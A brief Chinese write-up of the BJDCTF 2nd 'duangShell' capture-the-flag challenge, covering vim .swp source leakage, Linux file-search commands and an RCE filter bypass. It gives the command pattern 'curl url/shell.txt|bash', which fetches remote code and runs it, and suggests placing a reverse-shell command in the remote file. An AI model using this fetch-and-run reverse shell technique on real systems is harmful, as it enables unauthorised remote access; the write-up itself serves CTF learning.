[BJDCTF 2nd]duangShell

知识点: .swp文件泄露，RCE，Linux的找文件命令

.swp泄露

vim编辑一个文件产生的临时文件，处理不当有可能造成泄露。其泄露方式为
文件名.swp 有些时候文件名前会有一个点.。然后获得这个.swp文件后，在Linux里通过命令 vim -r xxx.swp 来让临时文件恢复正常

Linux的找文件相关的命令

find / -name 文件名
locate 文件名
whereis 文件名

本题的RCE绕过

通过 curl url获得某个网址的某个文件的内容，再通过管道符转移给bash处理,如:
curl url/shell.txt|bash shell.txt里是要执行的命令，本题建议在shell.txt里放反弹shell指令

题

进来后发现提示，输入路径 .index.php.swp得到index.php的临时文件，再通过vim -r .index.php.swp还原,得到源码:

过滤了十分多的东西.那么就用刚刚提到的curl url |bash 的方法getshell吧。
getshell后 再通过find / -name flag 得到flag。(flag藏得很深，不用find的话根本不可能找到)